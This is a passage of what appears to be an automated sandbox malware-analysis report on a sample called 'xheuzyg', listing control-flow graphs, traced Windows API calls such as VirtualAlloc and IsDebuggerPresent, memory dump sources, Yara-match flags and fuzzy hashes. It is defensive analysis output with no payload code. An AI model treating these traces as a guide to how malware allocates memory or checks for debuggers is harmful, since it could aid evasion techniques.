195->137 203 13806a8-13806ac 196->203 204 13806a6 196->204 199 13805f7-13805fb 197->199 201 1380638-1380650 199->201 202 13805fd-1380609 199->202 201->194 205 138060b-1380634 202->205 206 1380636 202->206 207 13806ae 203->207 208 13806b4-13806b8 203->208 204->137 205->206 206->199 207->208 210 13806ba 208->210 211 13806c0-13806c4 208->211 210->211 212 13806cc-13806d0 211->212 213 13806c6 211->213 214 13806dc-13806e2 212->214 215 13806d2-13806d7 call 1381136 212->215 213->212 214->134 214->137 215->214
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: D
                                                                                                                                                                  • API String ID: 0-2746444292
                                                                                                                                                                  • Opcode ID: d19940695f3dc53bddc8cdb7fb4c3e46727acefbf61e7478bc49b2156eacc16d
                                                                                                                                                                  • Instruction ID: 94ead1f5096cee48b7482135ea87d2de9020621bc929153c16688d48383fd114
                                                                                                                                                                  • Opcode Fuzzy Hash: d19940695f3dc53bddc8cdb7fb4c3e46727acefbf61e7478bc49b2156eacc16d
                                                                                                                                                                  • Instruction Fuzzy Hash: E102C270A00209EFEF19EF98C985BADBBB5FF04309F204159F515BA2A1D7749A89CF14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 255 1bb71d-1bb722 256 1bb724-1bb73c 255->256 257 1bb74a-1bb753 256->257 258 1bb73e-1bb742 256->258 260 1bb765 257->260 261 1bb755-1bb758 257->261 258->257 259 1bb744-1bb748 258->259 262 1bb7bf-1bb7c3 259->262 265 1bb767-1bb774 GetStdHandle 260->265 263 1bb75a-1bb75f 261->263 264 1bb761-1bb763 261->264 262->256 266 1bb7c9-1bb7cc 262->266 263->265 264->265 267 1bb7a1-1bb7b3 265->267 268 1bb776-1bb778 265->268 267->262 269 1bb7b5-1bb7b8 267->269 268->267 270 1bb77a-1bb783 GetFileType 268->270 269->262 270->267 271 1bb785-1bb78e 270->271 272 1bb790-1bb794 271->272 273 1bb796-1bb799 271->273 272->262 273->262 274 1bb79b-1bb79f 273->274 274->262
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 001BB769
                                                                                                                                                                  • GetFileType.KERNELBASE(00000000), ref: 001BB77B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                  • Opcode ID: 687b68b0299bc9c1a98b398f768042cb58a094e639a6c0be116bf3ed83c4a331
                                                                                                                                                                  • Instruction ID: 2dd8750c2055cbabab0686d5041c43986b24948a754aeed50a7cd9dbff0d103d
                                                                                                                                                                  • Opcode Fuzzy Hash: 687b68b0299bc9c1a98b398f768042cb58a094e639a6c0be116bf3ed83c4a331
                                                                                                                                                                  • Instruction Fuzzy Hash: B311E67120C7418AC7344E3E8CD86A2BA95ABD2374B39071AE5B7C7DF1CBB4D881D641
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 275 1b6c2b-1b6c36 276 1b6c38-1b6c42 275->276 277 1b6c44-1b6c4a 275->277 276->277 278 1b6c78-1b6c83 call 1b6094 276->278 279 1b6c4c-1b6c4d 277->279 280 1b6c63-1b6c74 RtlAllocateHeap 277->280 284 1b6c85-1b6c87 278->284 279->280 281 1b6c4f-1b6c56 call 1ba641 280->281 282 1b6c76 280->282 281->278 288 1b6c58-1b6c61 call 1b7d4d 281->288 282->284 288->278 288->280
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,001BB51A,00000001,00000364,?,00000006,000000FF,?,?,001B6099,001A105D), ref: 001B6C6C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: 54bd6c7b0d7c57a6d507b3225dae6d5a130011a0cb479c800454cd26365da090
                                                                                                                                                                  • Instruction ID: 3231b7baea20508b96d0d64dcfff182878d4582d4a6409f88769f2431be035f2
                                                                                                                                                                  • Opcode Fuzzy Hash: 54bd6c7b0d7c57a6d507b3225dae6d5a130011a0cb479c800454cd26365da090
                                                                                                                                                                  • Instruction Fuzzy Hash: D6F0E932545524A79B265B72DC45AFA3F59EF707B0B154121F9599B180CF2CEC0086E5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 013807DA: GetSystemInfo.KERNELBASE(?), ref: 013807F7
                                                                                                                                                                  • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0138089D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocInfoNumaSystemVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 449148690-0
                                                                                                                                                                  • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                                                                  • Instruction ID: fbe4a1958e7ea984b0799c6c81ed8de01eb3160b27ccf339132957a8a2f3eee1
                                                                                                                                                                  • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF051F0D4530ABFFF287BF88C0976D7A78DF10309F1045557A40761C5DA79464D8AA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 324 1b7330-1b733c 325 1b736e-1b7379 call 1b6094 324->325 326 1b733e-1b7340 324->326 333 1b737b-1b737d 325->333 328 1b7359-1b736a RtlAllocateHeap 326->328 329 1b7342-1b7343 326->329 331 1b736c 328->331 332 1b7345-1b734c call 1ba641 328->332 329->328 331->333 332->325 336 1b734e-1b7357 call 1b7d4d 332->336 336->325 336->328
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: 0cd737ffd6d20a4bd16e1c3cbd68f72814143a8ab185831b9d79bb7dc8a35822
                                                                                                                                                                  • Instruction ID: 60103000558a564206b78184aa9eaaa8d715f0d8ac8c2f32ba0b95148270af33
                                                                                                                                                                  • Opcode Fuzzy Hash: 0cd737ffd6d20a4bd16e1c3cbd68f72814143a8ab185831b9d79bb7dc8a35822
                                                                                                                                                                  • Instruction Fuzzy Hash: 47E06D3118D6659BEB212A769C01BDE7ADABFD17A0F2A0121FC15966E0DF64DC00A1E2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 339 1b681a-1b733c 341 1b736e-1b7379 call 1b6094 339->341 342 1b733e-1b7340 339->342 349 1b737b-1b737d 341->349 344 1b7359-1b736a RtlAllocateHeap 342->344 345 1b7342-1b7343 342->345 347 1b736c 344->347 348 1b7345-1b734c call 1ba641 344->348 345->344 347->349 348->341 352 1b734e-1b7357 call 1b7d4d 348->352 352->341 352->344
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                  • Opcode ID: a0e6626dbd8905454c10d86f140f4a87109f9d7f05eced4796c2c8eda7c0eff0
                                                                                                                                                                  • Instruction ID: d375983a62566002f2e1c3ecd3b4423dbfb9d175e283e82c02b7f9f4efddef21
                                                                                                                                                                  • Opcode Fuzzy Hash: a0e6626dbd8905454c10d86f140f4a87109f9d7f05eced4796c2c8eda7c0eff0
                                                                                                                                                                  • Instruction Fuzzy Hash: C5E0863654D128A7872115565C04FEB7BDDFBC1BB0F670111FD16576F08B51DC41A1D1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 412 138073a-1380781 call 138005f call 1380073 * 2 VirtualAlloc 419 1380788-1380790 412->419 420 1380783-1380786 412->420 421 1380792-138079f 419->421 422 13807d5-13807d9 419->422 420->419 423 13807a2-13807a6 421->423 424 13807a8-13807bc 423->424 425 13807be-13807cf 423->425 424->423 425->422
                                                                                                                                                                  APIs
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 01380777
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                  • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                                                                  • Instruction ID: 33c317521052cb29d83b0cac8dee54413c61e015468bcf64d01069dd5ae60584
                                                                                                                                                                  • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                                                                                                  • Instruction Fuzzy Hash: AF111C70D00219AFEB04EFA8CC49BEEBBF4EB04308F208495F915B7291D2754A45CF90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C46CE
                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001B96C1,?,?,?,00000055,?,-00000050,?,?), ref: 001C4705
                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 001C4799
                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 001C47A7
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001C4868
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                  • API String ID: 4147378913-905460609
                                                                                                                                                                  • Opcode ID: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
                                                                                                                                                                  • Instruction ID: 3ca7cc7612a48fa441ff2a2edc9f9ba9b83d50b93bb95deff0bdf729e83ae363
                                                                                                                                                                  • Opcode Fuzzy Hash: 0484e0acc7b968ae55a25f447ddf8d8c28a13375b284a2c6fd98ab7be32f7327
                                                                                                                                                                  • Instruction Fuzzy Hash: 13712671A08316ABEB24AB74DC96FBA77A8EF36700F10002EF905D7581EB70E8408765
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E41
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,001C50BA,00000002,00000000,?,?,?,001C50BA,?,00000000), ref: 001C4E6A
                                                                                                                                                                  • GetACP.KERNEL32(?,?,001C50BA,?,00000000), ref: 001C4E7F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                  • Opcode ID: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
                                                                                                                                                                  • Instruction ID: 372c589dae2ca2b249808fadc79c536c7dc7af20cb88cb604923d92b30488d34
                                                                                                                                                                  • Opcode Fuzzy Hash: 929e0652f73ebd67f3914d6491f44782e13b1cb4cc8c650e8a4ba87d22aa2cb7
                                                                                                                                                                  • Instruction Fuzzy Hash: 8021A132608100ABEB359F95C910FA773AABF74B64B57852CE90AD7100F736DD40C350
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001C508C
                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 001C50CA
                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 001C50DD
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001C5125
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001C5140
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                  • Opcode ID: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
                                                                                                                                                                  • Instruction ID: 3457eff7ff3d6594573aa57ba62f1ba06467932f9225949b564e12e7be191145
                                                                                                                                                                  • Opcode Fuzzy Hash: 7d5bda936a99aa52d79e580cf21fcd2ec8b0bf15d24a6d36dfafdcf4801ac31c
                                                                                                                                                                  • Instruction Fuzzy Hash: 81516C71A04609ABDB10DBA5CC85FAF77B9FF28700F58046DF901E7191DB70E9948BA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4A80
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4ACA
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4B90
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 661929714-0
                                                                                                                                                                  • Opcode ID: 50793565e79f581b1c30e6a6e01ef0b69f70f006d1fada66d501ca8651306a90
                                                                                                                                                                  • Instruction ID: ca7899b18f061a2525ca1bfad19facb65ae17df03397441b8a1fda77c3e713c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 50793565e79f581b1c30e6a6e01ef0b69f70f006d1fada66d501ca8651306a90
                                                                                                                                                                  • Instruction Fuzzy Hash: 9561AE719092079FEB289F28CCA2FBA77A8FF64300F10816EE915C6595E774ED80DB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 001B5A01
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 001B5A0B
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 001B5A18
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                  • Opcode ID: 080df7c8afd644e228c02c713ab0cf368dd76f6940a9d9f54a7e0adb20213c99
                                                                                                                                                                  • Instruction ID: 2826a0b478059bf68be51b02bf32ef3daa11c03606800bcd6e9319244608bf6f
                                                                                                                                                                  • Opcode Fuzzy Hash: 080df7c8afd644e228c02c713ab0cf368dd76f6940a9d9f54a7e0adb20213c99
                                                                                                                                                                  • Instruction Fuzzy Hash: BF31C27490122DABCB21DF68DC89BDDBBB8BF18314F5042EAE41CA7251E7709B858F45
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 001B0A45
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2325560087-3916222277
                                                                                                                                                                  • Opcode ID: 58e3928ec433567425cd7e1a26de1c86c1e2e5432f6d1136f74a6d4ecad97774
                                                                                                                                                                  • Instruction ID: 8a1529b64933a33bca567bb0de076ce85bee6fe353c3d4829afdb6172ecab7f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 58e3928ec433567425cd7e1a26de1c86c1e2e5432f6d1136f74a6d4ecad97774
                                                                                                                                                                  • Instruction Fuzzy Hash: 5C519AB2D06209CFEB25CFA9DA856AEBBF4FB08314F14806AD415EB254D774A940CF60
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
                                                                                                                                                                    • Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 001C4CD3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
